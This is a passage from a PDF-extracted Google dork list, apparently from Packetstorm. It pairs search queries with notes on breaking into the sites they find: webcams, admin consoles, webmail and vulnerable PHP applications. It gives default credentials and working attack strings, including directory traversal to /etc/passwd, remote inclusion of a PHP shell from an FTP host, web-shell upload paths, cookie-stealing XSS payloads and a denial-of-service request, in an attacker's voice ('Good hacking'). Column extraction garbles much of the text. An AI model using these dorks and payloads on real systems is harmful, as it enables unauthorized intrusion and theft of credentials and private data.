inurl:wl.exeinurl:?SS1=intext:"Operatingsystem:" -edu -gov-mil

inurl:wl.exe inurl:?SS1=intext:"Operating system:" -edu -gov -mil

List server apparently keeps track ofmany clients, not just Domains andhardware, but Operating systems aswell. As always this information is ableto be gained by Zero Packet methods.

inurl:setdo.cgiintext:"Set DOOK"

inurl:setdo.cgi intext:"Set DO OK"

Dcs-2100 camerasBy removing"intext:Set DO OK" you will get morehits but they will require a login. SetDO OK is almost always admin access,you will need to go to the root of theURL to use the camera.

intitle:"4images -Image GalleryManagementSystem" andintext:"Poweredby 4images 1.7.1"

intitle:"4images - Image GalleryManagement System" andintext:"Powered by 4images 1.7.1"

Find web app: 4Images = 1.7.1Thisweb app is vulenrable to remote codeexecution exploit.The url of exploit isthis:http://milw0rm.com/id.php?id=1533Good hackingBy HaVoC

"not for publicrelease" -.edu -.gov -.mil

"not for public release" -.edu -.gov -.mil

if you search through lots of these thenyou find some really juicy things, therefiles from police, airports, governmentcompanies all kind of stuff that is notmeant to be seen by normal people.

(intitle:"metaframeXPLogin")|(intitle:"metaframePresentation serverLogin")

(intitle:"metaframe XPLogin")|(intitle:"metaframePresentation server Login")

Once you input any username, you'llget an error message. Try putting ascript with some other fun commandsin it. Just send some info off to belogged.If exploited correctly, couldgive you admin access to a network.

Page 236: Packetstorm Google Dorks List

inurl:ids5web inurl:ids5web

EasyAccess Web is a application toview radiological images online.Like inhospitals or universities.Problem is thedefault administrative login:wadm/wadmBe able to watch sensitivedata and images.very bad...

filetype:sql "insertinto"(pass|passwd|password)

filetype:sql "insert into"(pass|passwd|password)

Looks for SQL dumps containingcleartext or encrypted passwords.

"Powered bySimplog" "Powered by Simplog"

searches for simplog which hasdirectory traversal and XSSvelnerabilites in version

"index of /" (upload.cfm |upload.asp |upload.php |upload.cgi |upload.jsp |upload.pl )

"index of /" ( upload.cfm |upload.asp | upload.php | upload.cgi| upload.jsp | upload.pl )

searches for scripts that let you uploadfiles which you can then execute on theserver.

inurl:"/admin/configuration. php?"Mystore

inurl:"/admin/configuration. php?"Mystore

simply google inurl trick forOscommerce for open administratorpage.If no .htpassword is set for theadmin folder of osCommerce then ofcourse you can change any setting inthe shop unless password security hasbeen enabled on the adminconsole.Despite a few demo pagesthere are a few open admin pages forwebshops.Simple patch if you are oneis to place a .htpassword file in the rootof the admin folder. -- J.R.Middleton

"powered bysblog" +"version0.7"

"powered by sblog" +"version 0.7"

please go here for a writeup on thevulnerability.HTMLinjection.http://www.securityfocus.com/bid/17044

inurl:"NmConsole/Login.asp" |intitle:"Login -Ipswitch WhatsUpProfessional 2005"| intext:"IpswitchWhatsUpProfessional 2005

inurl:"NmConsole/Login.asp" |intitle:"Login - Ipswitch WhatsUpProfessional 2005" |intext:"Ipswitch WhatsUpProfessional 2005 (SP1)" "Ipswitch,Inc"

Ipswitch Whats Up Monitoring2005!This is a console for NetworkMonitoring, access beyond the portalwill allow you to do various things,such as telnet to internal machines,reboot servers, gain server informationsuch as IP address.If theAdministrators have utilised WUG to

Page 237: Packetstorm Google Dorks List

(SP1)" "Ipswitch,Inc"

its potential, they will have also madefull Infrastructure MAPs available.Access beyond the portal is GoldInformation, you would have access toinformation and services as if you werean Administrator.In addition, some ofthe links, allow you to go beyond theportal as a guest user, this still allowsreconisance of various servers anddetails of them, including where theyare located physically.For anybody thatis interested, the Login Portal has aSQL based Backend.

filetype:asp +"[ODBC SQL" filetype:asp + "[ODBC SQL"

This search returns more than just theone I saw already here. This one willreturn all ODBC SQL error pagesincluding all data returned in the error.The information can range from simpledata such as the table/row queried tofull Database name etc.An attackercould take this information and use it togain a foot hold into the SQL serverand could use the information for anSQL injection attack.

intitle:"Joomla -Web Installer" intitle:"Joomla - Web Installer"

Joomla! is a Content ManagementSystem (CMS) created by the sameteam that brought the Mambo CMS.This dork finds the Web Installer page.On newer versions, after you install,joomla asks to delete installation dirbefore to be functional.TheWebinstaller gives an attackerinformation about the phpconfiguration and rgod has even founda way to inject data into theconfiguration.php file, resulting in aDoS attack (see the forums for moreinfo).The admin logon can be foundsearching: intitle:"- Administration[Joomla]" but there are no defaultpasswords.

intitle:"WebviewLogon Page"

http://www.google.com/search?q=intitle:%22Webview+Logon+Page%22&filter=0

This is the web interface for Alcatel'sOmniswitch. Default login is:admin/switch.

(intitle:"PRTG (intitle:"PRTG Traffic Grapher" PRTG Traffic Grapher is Windows

Page 238: Packetstorm Google Dorks List

Traffic Grapher"inurl:"allsensors")|(intitle:"PRTGTraffic Grapher -MonitoringResults")

inurl:"allsensors")|(intitle:"PRTGTraffic Grapher - MonitoringResults")

software for monitoring and classifyingbandwidth usage. It provides systemadministrators with live readings andlong-term usage trends for theirnetwork devices. The most commonusage is bandwidth usage monitoring,but you can also monitor many otheraspects of your network like memoryand CPU utilizations.

intitle:"AR-*""browser of framedealing isnecessary"

intitle:"AR-*" "browser of framedealing is necessary" A few Sharp printers ..

intitle:"WxGoos-"("Cameraimage"|"60seconds" )

intitle:"WxGoos-" ("Cameraimage"|"60 seconds" )

This is used in serverrooms and suchwhere climate conditions are crucial tohardware health. If an attacker were toguess the password for theconfiguration page, then he can findPOP3 passwords in plain text in theHTML source code.It runs on "I.T.Watchdogs, Inc. Embedded WebServer"

intext:"you tohandle frequentconfiguration jobseasily and quickly"|intitle:"Show/Search other devices"

intext:"you to handle frequentconfiguration jobs easily andquickly" | intitle:"Show/Searchother devices"

ELSA DSL lan modems.

intitle:"NAS"inurl:indexeng.html

intitle:"NAS" inurl:indexeng.html Disk Online Server NAS device.

"Thank You forusing WPCeasy" "Thank You for using WPCeasy"

There is a SQL injection vulnerabilityin WPC.easy, resulting in full adminaccess to any remote attacker. Vendorwas notified.http://www.securityfocus.com/archive/1/425395

intitle:"SkystreamNetworks EdgeMedia Router" -securitytracker.com

intitle:"Skystream Networks EdgeMedia Router" -securitytracker.com

skystream Networks Edge MediaRouter.

intitle:"Ethernet intitle:"Ethernet Network Attached Linksys network storage utility.

Page 239: Packetstorm Google Dorks List

Network AttachedStorage Utility"

Storage Utility"

intitle:"GigaDriveUtility" intitle:"GigaDrive Utility" Linksys GigaDrive network storage

utility.intitle:"LOGREP -Log file reportingsystem" -site:itefix.no

intitle:"LOGREP - Log filereporting system" -site:itefix.no

Logrep is an open source log fileExtraction and Reporting System byITeF!x. This dork finds the logs that itcreates.

inurl:2000intitle:RemotelyAnywhere -site:realvnc.com

inurl:2000intitle:RemotelyAnywhere -site:realvnc.comg

RemotelyAnywhere is a program thatenables remote control, in the samematter as VNC. Once Logged in anattacker has almost complete control ofthe computer.

"Web-BasedManagement""Please inputpassword to login"-inurl:johnny.ihackstuff.com

"Web-Based Management" "Pleaseinput password to login" -inurl:johnny.ihackstuff.com

This dork finds firewall/vpn productsfrom fiber logic. They only require aone-factor authentication.

intitle:"DVRClient" -the -free -pdf -downloads -blog -download -dvrtop

intitle:"DVR Client" -the -free -pdf-downloads -blog -download -dvrtop

This dork finds digital video recordingclient from Nuvico.

"OK logout"inurl:vb.htm?logout=1

"OK logout" inurl:vb.htm?logout=1

This is a google dork for HuntElectronics web cams. To get to thecameras remove the vb.htm?logout=1from the url.

intitle:"Edr1680remote viewer" intitle:"Edr1680 remote viewer" This search finds the 1680 series digital

video recorder from EverFocus.inurl:"vsadmin/login" |inurl:"vsadmin/admin"inurl:.php|.asp -"Response.Buffer= True" -javascript

inurl:"vsadmin/login" |inurl:"vsadmin/admin"inurl:.php|.asp -"Response.Buffer =True" -javascript

Ecommerce templates makes a onlineshopping cart solution. This searchfinds the admin login.

intitle:"Login to@Mail" (ext:pl |inurl:"index") -dwaffleman

intitle:"Login to @Mail" (ext:pl |inurl:"index") -dwaffleman

Webmail is a http based email servermade by atmail.com. To get to theadmin login instead of regular loginadd webadmin/ to the url.

inurl:"calendarscri inurl:"calendarscript/users.txt" CalenderScript is an overpriced online

Page 240: Packetstorm Google Dorks List

pt/users.txt" calender system written in perl. Thepasswords are encrypted using perl'scrypt() function which I think DESencrypts things. However if thecomputer the calender script is ondoesn't support the crypt function theare plaintext. Changing calender datesmight not sound useful but peoplereuse passwords so who knows? Alsosearch for the logins:intitle:"CalendarAdministration : Login" |inurl:"calendar/admin/index.asp" -demo -demos Then to get thepasswords change the urlfromwxw.calendersiteexample.com/thissite/calendar_admin.cgitowxw.calendersiteexample.com/thissite/calendarscript/users.txt The defaults areanonymous/anonymous andAdministrator/Administrator.

intitle:"EZPartner"-netpond intitle:"EZPartner" -netpond

EZPartner is a great marketing tool thatwill help you increase your sales bysending webmaster affiliate traffic toyour sites. This search finds the logins.

"Powered byLoudblog" "Powered by Loudblog" this dork is for the LoudBlog

"This websiteengine code iscopyright" "2005by Clever Copy" -inurl:demo

"This website engine code iscopyright" "2005 by Clever Copy" -inurl:demo

Clever Copy

"index of"intext:fckeditorinurl:fckeditor

"index of" intext:fckeditorinurl:fckeditor

"index of" intext:fckeditorinurl:fckeditor this dork is forFCKEditor scriptthrougheditor/filemanager/browser/default/connectors/connector.php script a user canupload malicious contempt on targetmachine including php code and launchcommands... however if you do notsucceed to execute the shell,FCKEditor is integrated in a lot ofapplications, you can check for a localinclusion issue inside of them... thistool make the dirty work for 2.0 - 2.2versions:

Page 241: Packetstorm Google Dorks List

http://retrogod.altervista.org/fckeditor_22_xpl.html

"powered byruncms" -runcms.com -runcms.org

"powered by runcms" -runcms.com-runcms.org

"powered by runcms" -runcms.com -runcms.org all versions

inurl:docmgr |intitle:"DocMGR""enter yourUsernameand"|"undPasswortbitte"|"saisir votrenom"|"su nombrede usuario" -ext:pdf -inurl:"download.php

inurl:docmgr | intitle:"DocMGR""enter your Username and"|"undPasswort bitte"|"saisir votrenom"|"su nombre de usuario" -ext:pdf -inurl:"download.php

exploit and short explaination:http://retrogod.altervista.org/docmgr_0542_incl_xpl.html

(intitle:"Flyspraysetup"|"poweredby flyspray 0.9.7")-flyspray.rocks.cc

(intitle:"Flyspray setup"|"poweredby flyspray 0.9.7") -flyspray.rocks.cc

exploiting a bug in EGS EnterpriseGroupware System 1.0 rc4, I found thisdork: (intitle:"Flyspraysetup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc It is related to theinstallation script of FileSpray 0.9.7,now I'm going to test 0.9.8-9 by nowswitch to sql/ directory and search theinstall-0.9.7.php script explainationlink:http://retrogod.altervista.org/egs_10rc4_php5_incl_xpl.htmlexploit adjustedfor flyspray:http://retrogod.altervista.org/flyspray_097_php5_incl_xpl.html

intext:"LinPHAVersion"intext:"Have fun"

intext:"LinPHA Version"intext:"Have fun" this is for Linpha

inurl:updown.php |intext:"Poweredby PHP UploaderDownloader"

inurl:updown.php | intext:"Poweredby PHP Uploader Downloader"

this (evil ) script lets you to upload aphp shell on target server, in mostcases not password protected dork:inurl:updown.php | intext:"Powered byPHP Uploader Downloader" a note:sometimes you don't see a link to a listof uploaded files... just switch tohttp://[target]/[path]/updown.php?actio

Page 242: Packetstorm Google Dorks List

n=download

("powered bynocc"intitle:"NOCCWebmail") -site:sourceforge.net -Zoekinalles.nl -analysis

("powered by nocc" intitle:"NOCCWebmail") -site:sourceforge.net -Zoekinalles.nl -analysis

dork: ("powered by nocc"intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis software:http://nocc.sourceforge.net/ this is forNocc Webmail multiple arbitrary localinclusion, multiple xss & possibleremote code execution flaws I found:example of arbitrary local inclusion:http://[target]/[path]/html/footer.php?cmd=dir&_SESSION[nocc_theme]=../../../../../../../../../test.php%00http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=../../../../../../../../../../../../etc/passwd%00http://[target]/[path]/index.php?lang=fr&theme=../../../../../../../../../../../../etc/passwd%00http://[target]/[path]/index.php?lang=../../../../../../../../../../../../test example ofcommands execution (including anuploaded mail attachment with phpcode inside, filename is predictable...)http://[target]/[path]/index.php?cmd=dir&lang=../tmp/php331.tmp1140514888.att%00 xss:http://[target]/[path]/html/error.php?html_error_occurred=alert(document.cookie)http://[target]/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie)http://[target]/[path]/html/no_mail.php?html_no_mail=alert(document.cookie)http://[target]/[path]/html/html_bottom_table.php?page_line=alert(document.cookie)http://[target]/[path]/html/html_bottom_table.php?prev=alert(document.cookie)http://[target]/[path]/html/html_bottom_table.php?next=alert(document.cookie)http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=">alert(docum

Page 243: Packetstorm Google Dorks List

ent.cookie) full advisory & poc exploit:http://retrogod.altervista.org/noccw_10_incl_xpl.html

intitle:"igenuswebmail login" intitle:"igenus webmail login"

intitle:"igenus webmail login"exampleexploit:http://[target]/[path]/?Lang=../../../../../../../../../../etc/passwd%00http://[target]/[path]/config/config_inc.php?SG_HOME=../../../../../../../../../../etc/passwd%00 also, on php5:http://[target]/[path]/config/config_inc.php?SG_HOME=ftp://username:[email protected]&cmd=dir whereon somehost.com you have a php shellcode in a ".config" file exploit code:http://retrogod.altervista.org/igenus_202_xpl_pl.html

allintitle:"FirstClass Login" allintitle:"FirstClass Login"

allintitle:"FirstClass Login" this is forfirstclass directory listingsgo tohttp://[target]/[path]/Search type just 'in search field and you have a list ofdownloadable files, you don't see allfiles on server but you can search for arobots.txt with some folders path orother info for site scructure, crawling inthis way you have unauthorized accesson all files on the target server

"powered by4images" "powered by 4images" this is for 4images

intext:"PoweredBy Geeklog" -geeklog.net

intext:"Powered By Geeklog" -geeklog.net

dork: intext:"Powered By Geeklog" -geeklog.net this is for the vulnerabilitydiscovered by GulfTech research,related stuff: (*)http://www.gulftech.org/?node=research&article_id=00102-02192006http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=geeklog&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0 exploit for(*) :http://retrogod.altervista.org/geeklog_1_4_xpl_php_.html (php)http://retrogod.altervista.org/geeklog_1_4_xpl_perl_.html (perl...mphhh)

Page 244: Packetstorm Google Dorks List

intitle:admbookintitle:versionfiletype:php

intitle:admbook intitle:versionfiletype:php

intitle:admbook intitle:versionfiletype:php tested version: 1.2.2, youcan inject php code in config-data.phpand execute commands on targetthrough X-FOWARDED FOR httpheader when you post a message alsoyou can see phpinfo():http://[target]/[path]/admin/info.phpperlexploit:http://retrogod.altervista.org/admbook_122_xpl.html

WEBalbum 2004-2006 duda -ihackstuff -exploit

WEBalbum 2004-2006 duda -ihackstuff -exploit

dork: WEBalbum 2004-2006 duda -ihackstuff -exploitsoftware site:http://www.web-album.org/ advisory/poc exploit:http://retrogod.altervista.org/webalbum_202pl_local_xpl.html

intext:"Poweredby Plogger!" -plogger.org -ihackstuff -exploit

intext:"Powered by Plogger!" -plogger.org -ihackstuff -exploit

explaination & exploit:http://retrogod.altervista.org/plogger_b21_sql_xpl.html

intext:"powered bygcards" -ihackstuff-exploit

intext:"powered by gcards" -ihackstuff -exploit this is for gcards

"powered by phpicalendar" -ihackstuff -exploit

"powered by php icalendar" -ihackstuff -exploit this is for php iCalendar

"powered byguestbook script" -ihackstuff -exploit

"powered by guestbook script" -ihackstuff -exploit

poc exploit & explaination:http://retrogod.altervista.org/gbs_17_xpl_pl.html

"Powered by XHPCMS" -ihackstuff -exploit -xhp.targetit.ro

"Powered by XHP CMS" -ihackstuff -exploit -xhp.targetit.ro

tested version: 0.5 without to haveadmin rights, you can go to:http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/manager.php orhttp://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/standalonemanager.php to upload a shell with theusual code inside... after:http://[target]/[path]/filemanager/shell.php?cmd=ls%20-la tool:http://retrogod.altervista.org/XHP_CMS_05_xpl.html

inurl:*.exe ext:exe inurl:*.exe ext:exe inurl:/*cgi*/ a cgi-bin executables xss/html injection

Page 245: Packetstorm Google Dorks List

inurl:/*cgi*/ miscellanea:someexamples:inurl:keycgi.exe ext:exeinurl:/*cgi*/ xss:http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=">[XSS HERE] inurl:wa.exeext:exe inurl:/*cgi*/ xss:http://[target]/[path]/cgi-bin/wa.exe?SUBED1=">[XSS HERE]inurl:mqinterconnect.exe ext:exeinurl:/*cgi*/ xss:http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=">[XSSHERE]&poi1city=city&poi1state=OKinurl:as_web.exe ext:exe inurl:/*cgi*/xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSSHERE]+B+wishes inurl:webplus.exeext:exe inurl:/*cgi*/ xss:http://[target]/[path]/cgi-bin/webplus.exe?script=">[XSSHERE] inurl:odb-get.exe ext:exeinurl:/*cgi*/ xss:http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=">[XSSHERE]&WIT_oid=what::what::1111&m=1&d= inurl:hcapstat.exe ext:exeinurl:/*cgi*/ xss:http://[target]/[path]/cgi-bin/hcapstat.exe?CID=">[XSSHERE]&GID=&START=110&SBN=OFF&ACTION=Submitinurl:webstat.exe ext:exe inurl:/*cgi*/xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=">[XSSHERE] inurl:cows.exe ext:exeinurl:/*cgi*/ xss:http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=">[XSS HERE]inurl:findifile.exe ext:exe inurl:/*cgi*/xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=">[XSSHERE]&LIMIT=50&YEAR=">inurl:baserun.exe ext:exe inurl:/*cgi*/

Page 246: Packetstorm Google Dorks List

xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=">[XSS HERE]inurl:Users.exe ext:exe inurl:/*cgi*/html injection:http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html]

"powered byclaroline" -demo "powered by claroline" -demo this is for Claroline e-learning platform

"PhpCollab . LogIn" | "NetOffice .Log In" |(intitle:"index.of."intitle:phpcollab|netofficeinurl:phpcollab|netoffice -gentoo)

"PhpCollab . Log In" | "NetOffice .Log In" | (intitle:"index.of."intitle:phpcollab|netofficeinurl:phpcollab|netoffice -gentoo)

this is for PhpCollab 2.x / NetOffice2.x sqlinjectionhttp://retrogod.altervista.org/phpcollab_2x-netoffice_2x_sql_xpl.html

inurl:/counter/index.phpintitle:"+PHPCounter 7.*"

inurl:/counter/index.phpintitle:"+PHPCounter 7.*"

This is an online vulnerable web statprogram called PHPCounter7.http://www.clydebelt.org.uk/counter/help.html It has several publicvulnerabilities in versions 7.1 and 7.2that include cross site scripting andunauthorized information disclosure.

intext:"2000-2001The phpHeavenTeam" -sourceforge

intext:"2000-2001 The phpHeavenTeam" -sourceforge this is the dork for PHPMyChat

"2004-2005ReloadCMSTeam."

"2004-2005 ReloadCMS Team." this is for ReloadCMS

intext:"2000-2001The phpHeavenTeam" -sourceforge

intext:"2000-2001 The phpHeavenTeam" -sourceforge

intext:"2000-2001 The phpHeavenTeam" -sourceforge this is forPHPMyChat remote commandsexecution,advisory/pocexploits:http://retrogod.altervista.org/phpmychat_0145_xpl.htmlhttp://retrogod.altervista.org/phpmychat_015dev_xpl.html

inurl:server.phpext:php intext:"NoSQL" -Released

inurl:server.php ext:php intext:"NoSQL" -Released

vulnerabilitydiscovered by Secunia,quickreference:http://www.securityfocus.com/bid/16187an example of exploit forPHPOpenChat:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmla

Page 247: Packetstorm Google Dorks List

DOSexploit:http://retrogod.altervista.org/adodb_dos.html

intitle:PHPOpenChatinurl:"index.php?language="

intitle:PHPOpenChatinurl:"index.php?language="

exploit:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmlalso,informationdisclosure:http://[target]/[path]/include/adodb/tests/tmssql.php?do=phpinfoanddenial of service on some windowssystem, multiple requestsof:http://[target]/[path]/include/adodb/tests/tmssql.php?do=closelog

"powered byphplist" |inurl:"lists/?p=subscribe" |inurl:"lists/index.php?p=subscribe" -ubbi -bugs+phplist -tincan.co.uk

"powered by phplist" |inurl:"lists/?p=subscribe" |inurl:"lists/index.php?p=subscribe"-ubbi -bugs +phplist -tincan.co.uk

this is for PHPList 2.10.2 arbitrarylocal inclusion, discovered byme:advisory/poc exploit:http://retrogod.altervista.org/phplist_2102_incl_xpl.html

inurl:"extras/update.php"intext:mysql.php -display

inurl:"extras/update.php"intext:mysql.php -display

this is an osCommercedork:inurl:"extras/update.php"intext:mysql.php -display or moresimply: inurl:"extras/update.php" -display (this display some more hostswhere error_reporting=0) I found thissimple exploit, if extras/ folder is insidethe www path, you can view all files ontarget system, including php files andso on, ex:http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.phphttp://[target]/[path]/extras/update.php?read_me=0&readme_file=../index.phphttp://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/fstabalso, if you succeed to view configurescript with database details, you canconnect to it trough some test scriptsinside this folder...now I readthis:http://www.securityfocus.com/bid/14294/infothis is actuallyunpatched/unresolved in 2.2 on Apr

Page 248: Packetstorm Google Dorks List

2006

inurl:sysinfo.cgiext:cgi inurl:sysinfo.cgi ext:cgi

dork:inurl:sysinfo.cgi ext:cgi exploit:http://www.milw0rm.com/exploits/1677 I found this command executionvulnerability in 1.2.1 but other versionsmaybe vulnerable toohowever, u cansee version in google results

inurl:perldiver.cgiext:cgi inurl:perldiver.cgi ext:cgi

dork: inurl:perldiver.cgi ext:cgi someinteresting info about server and across site scripting vulnerability, poc:http://[target]/[path]/cgi-bin/perldiver.cgi?action=20&alert("lol")otherreference:http://secunia.com/advisories/16888/

inurl:tmssql.phpext:php mssql pearadodb -cvs -akbk

inurl:tmssql.php ext:php mssql pearadodb -cvs -akbk

dork:inurl:tmssql.php ext:php mssqlpear adodb -cvs -akbka remote user canexecute an arbitrary function (withoutarguments) example:http://[target]/[path]/tmssql.php?do=phpinforeference:http://www.osvdb.org/displayvuln.php?osvdb_id=22291 I alsodiscovered that you can crash somewin boxes / apache servers bysendingmultiple requests ofhttp://[target]/[path]/tmssql.php?do=closelogsee:http://www.milw0rm.com/exploits/1651

"powered by phpphoto album" |inurl:"main.php?cmd=album" -demo2 -pitanje

"powered by php photo album" |inurl:"main.php?cmd=album" -demo2 -pitanje

dork: "powered by php photo album" |inurl:"main.php?cmd=album" -demo2 -pitanje poc: if register_globals = On &magic_quotes_gpc = Offhttp://[target]/[path]/language.php?data_dir=/etc/passwd%00 on, php5, ifregister_globals = on:http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:[email protected]/public/ where onftp you have a translation.dat file withshellcode inside references:http://retrogod.altervista.org/phpalbum_0323_incl_xpl.htmlhttp://www.securityfocus.com/bid/175

Page 249: Packetstorm Google Dorks List

26intitle:"IVCControl Panel" intitle:"IVC Control Panel" this searches for security cameras,

vendor site:http://www.ivcco.com/(intitle:MOBOTIXintitle:PDAS) |(intitle:MOBOTIXintitle:Seiten) |(inurl:/pda/index.html +camera)

(intitle:MOBOTIX intitle:PDAS) |(intitle:MOBOTIX intitle:Seiten) |(inurl:/pda/index.html +camera)

more cams...vendor site:http://www.mobotix.com/layout/set/index/language/index

intitle:"MvBlogpowered" intitle:"MvBlog powered"

MvBlog is prone to multiple input-validation vulnerabilities. These issuesare due to a failure in the application toproperly sanitize user-suppliedinput.The application is prone toHTML-injection and SQL-injectionvulnerabilities. A successful exploitcould allow an attacker to compromisethe application, access or modify data,or exploit vulnerabilities in theunderlying database implementation.Arbitrary script code may also beexecuted in the browser of anunsuspecting user in the context of theaffected site; this may help the attackersteal cookie-based authenticationcredentials and launch otherattacks.http://www.securityfocus.com/bid/17481/discuss

"powered byactive phpbookmarks" |inurl:bookmarks/view_group.php?id=

"powered by active php bookmarks"|inurl:bookmarks/view_group.php?id=

Active PHP Bookmarks, a web basedbookmark manager, was originallydeveloped by Brandon Stone. Due tolack of time he has withdrawn himselffrom the project, however keeping hisdevelopment forum on-line. OnDecember 3rd 2004 this APB-forum,which was still the home of a small butrelatively active community, wascompromised. All content of the forumwas lost, including links to importantuser contributed patches for the APBcode.exploit (i haven't testedit)http://www.securityfocus.com/archive/1/305392my version ofexploithttp://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps

Page 250: Packetstorm Google Dorks List

Please enter avalid password!inurl:polladmin

Please enter a valid password!inurl:polladmin

The PHP Poll Wizard 2 ist a powerfuland easy-to-use PHP-Script forcreating and managing polls.moregeneric dork:"Powered by PHP PollWizard" | intitle:"php poll wizard"

"Warning:Division by zeroin" "on line" -forum

"Warning: Division by zero in" "online" -forum

Just another error that reveals fullpaths.

inurl:resetcore.phpext:php inurl:resetcore.php ext:php

e107 is a content management systemwritten in php and using the popularopen source mySQL database systemfor content storage. It's completely freeand totally customisable, and inconstant development.rgodsexploit:http://retrogod.altervista.org/e107remote.html

"Warning:mysql_connect():Access denied foruser: '*@*" "online" -help -forum

"Warning: mysql_connect(): Accessdenied for user: '*@*" "on line" -help -forum

This dork reveals logins to databasesthat were denied for some reason.

"Warning:" "failedto open stream:HTTP requestfailed" "on line"

"Warning:" "failed to open stream:HTTP request failed" "on line" Just another error message.

"Warning: Badarguments to(join|implode) ()in" "on line" -help-forum

"Warning: Bad arguments to(join|implode) () in" "on line" -help-forum

and another error. open it from cachewhen not working.

"Unable to jump torow" "on MySQLresult index" "online"

"Unable to jump to row" "onMySQL result index" "on line" another error message

"This script wascreated by Php-ZeroNet" "Script .Php-ZeroNet"

"This script was created by Php-ZeroNet" "Script . Php-ZeroNet"

Php-ZeroNet is a script comprised ofphp allowing webmasters to start aonline community. Php-ZeroNetfeatures Content Management, Newsposting, User CP, interactive sytem,etc. Php-ZeroNet uses a wide range ofdifferent cases in its script, it canadaptmy exploit:http://fr0zen.no-ip.org/phpnetzero-1.2.1_xpl.phps

Page 251: Packetstorm Google Dorks List

"You have notprovided a surveyidentificationnumber" ERROR -xoops.org "pleasecontact"

"You have not provided a surveyidentification num

sqlinjection:http://www.securityfocus.com/bid/16077/discussremote commandexecution:http://retrogod.altervista.org/phpsurveyor_0995_xpl.html

intitle:"HelpDesk""If you needadditional help,please emailhelpdesk at"

intitle:"HelpDesk" "If you needadditional help, please emailhelpdesk at"

it's another helpdesk application.myexploit:http://fr0zen.no-ip.org/phphelpdesk-0.6.16_rcxcn_xpl.phps

inurl:database.php| inurl:info_db.phpext:php "DatabaseV2.*" "BurningBoard *"

inurl:database.php |inurl:info_db.php ext:php "DatabaseV2.*" "Burning Board *"

this is for Woltlab Burning Board 2.x(Datenbank MODfileid)exploit:http://seclists.org/lists/bugtraq/2006/Mar/0058.html

inurl:"php121login.php" inurl:"php121login.php"

"PHP121 is a free web based instantmessenger - written entirely in PHP.This means that it will work in anybrowser on any operating systemincluding Windows and Linux,anywhere!"

"The statisticswere last updated""Daily"-microsoft.com

"The statistics were last updated""Daily"-microsoft.com

Results include many varius Networkactivity logs

intitle:"EmployeeIntranet Login" intitle:"Employee Intranet Login" Intranet login pages by decentrix.com

intitle:"Uploader -Uploader v6" -pixloads.com

intitle:"Uploader - Uploader v6" -pixloads.com

File upload servers, dangerous if usedin couple with mytrashmail.com

inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"

inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"

Customer login pages"SalesLogix isthe Customer RelationshipManagement Solution that drives salesperformance in small to Medium-sizedbusinesses through Sales, Marketing,and Customer Support automation andback-officeintegration."

(intitle:"Pleaselogin - Forumspowered byWWWThreads")|(inurl:"wwwthreads/

(intitle:"Please login - Forumspowered byWWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")

"WWWthreads is a high powered, fullscalable, customizable open sourcebulletin board package that you will beable to modify to your specific topics,users, and needs. WWWthreads has an

Page 252: Packetstorm Google Dorks List

login.php")|(inurl:"wwwthreads/login.pl?Cat=")

extremely comprehensive interface, avery simple administration panel forquick set up and management, as wellas a frequently asked questions to helpguide you through the process shouldyou hit any snags or have anyquestions."

intitle:"ApacheStatus" "ApacheServer Status for"

intitle:"Apache Status" "ApacheServer Status for" New Apache Server Status Dork

(intitle:"rymoLogin")|(intext:"Welcome to rymo") -family

(intitle:"rymoLogin")|(intext:"Welcome to rymo")-family

"rymo is a small but reliable webmailgateway. It contacts a POP3-server formail reading and uses the PHP-internalmail functions for mail sending."

"SquirrelMailversion" "By theSquirrelMailDevelopmentTeam"

"SquirrelMail version" "By theSquirrelMail Development Team" More SquirrelMail Logins

intitle:"TWIGLogin" intitle:"TWIG Login"

"TWIG is a Web-based groupwaresuite written in PHP, compatible withboth PHP3 and PHP4. Its featuresinclude IMAP and POP3 email, Usenetnewsgroups, contact management,scheduling, shared notes andbookmarks, a todo list, and meetingannouncements."

intitle:IMPinurl:imp/index.php3

intitle:IMP inurl:imp/index.php3

Webmail Login pages for IMP"IMP isa set of PHP scripts that implement anIMAP based webmail system.Assuming you have an account on aserver that supports IMAP, you can usean installation of IMP to check yourmail from anywhere that you have webaccess."

(intitle:"SHOUTcastAdministrator")|(intext:"USHOUTcastD.N.A.S. Status")

(intitle:"SHOUTcastAdministrator")|(intext:"USHOUTcast D.N.A.S. Status")

sHOUTcast is a free-of-charge audiohomesteading solution. It permitsanyone on the internet to broadcastaudio from their PC to listeners acrossthe Internet or any other IP-basednetwork (Office LANs, collegecampuses, etc.).SHOUTcast'sunderlying technology for audiodelivery is MPEG Layer 3, also known

Page 253: Packetstorm Google Dorks List

as MP3 technology. The SHOUTcastsystem can deliver audio in a livesituation, or can deliver audio on-demand for archived broadcasts.

intitle:"SHOUTcast Administrator"inurl:admin.cgi

intitle:"SHOUTcast Administrator"inurl:admin.cgi

